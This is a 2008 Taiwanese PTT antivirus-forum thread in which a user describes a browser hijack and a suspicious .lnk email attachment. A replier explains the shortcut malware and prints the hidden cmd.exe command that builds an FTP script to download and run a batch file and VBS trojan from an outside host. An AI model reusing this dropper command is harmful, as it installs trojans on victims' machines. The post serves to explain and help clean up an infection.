作者xiaoyao (改變)
看板AntiVirus
標題Re: [中毒] 我的IE怪怪的 是中毒了嗎?
時間Tue Dec 30 20:22:01 2008
※ 引述《zenk73 (Evan)》之銘言:
: 我的IE要連去各個地方法院的網站都會移到以下網址
: http://wsearch.net/?unknown
: 爬文有聽說 IE7的問題 可是我有更新過了 用NOD32和趨勢的線上掃毒都沒辦法解決
: 我媽用我的電腦看email 有署名我爸的寄件者寄給她
: 可是副檔名是.ink 而且檔案很小 重點是我爸說他沒寄 ˊˋ
: 不知道是不是因為那個的關係
: 去google搜尋這個網址的資訊沒有中文資料
: 但是有國外的人有和我一樣的問題
: 請問要如何解決呢 ~"~ 謝謝
您說的那是.lnk才對
捷徑Malware 大多數的防毒軟體無法偵測
市面上能偵測出的不超過5家
捷徑的內容藏有指令
呼叫連結FTP下載真正的木馬病毒
%windir%\system32\cmd.exe /c
echo open lin31003100.3322.org > t.t
echo 123>>t.t
echo 123>>t.t
echo get down3.bat c:\down3.bat >> t.t
&echo get vnet3.vbs %windir%\vnet3.vbs >> t.t
echo bye >> t.t
ftp -s:t.t
del t.t
start %windir%\vnet3.vbs&
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 140.130.189.41
推 joycewanga:好可怕 12/30 20:36
推 lcjjaff:挖喔...都已經分析完了XD 只要那個vb檔不要太機車.. 12/30 20:59
→ lcjjaff:一切好說@@a 12/30 20:59
推 zenk73:天呀 除了重灌 還有救嗎? 12/30 21:00
→ zenk73:那網頁綁架也是那個病毒的關係嗎? 還是又不同病毒= =? 12/30 21:03
→ lcjjaff:z掃log上來問吧XD 12/30 21:13
→ zenk73:不好意思 剛剛才看到置底文~"~ 12/30 21:15
→ lcjjaff:刪掉c:\winnt\vnet.vbs 12/30 21:23
→ zenk73:vnet刪掉了 網頁還是不能進入 > <" 12/30 21:25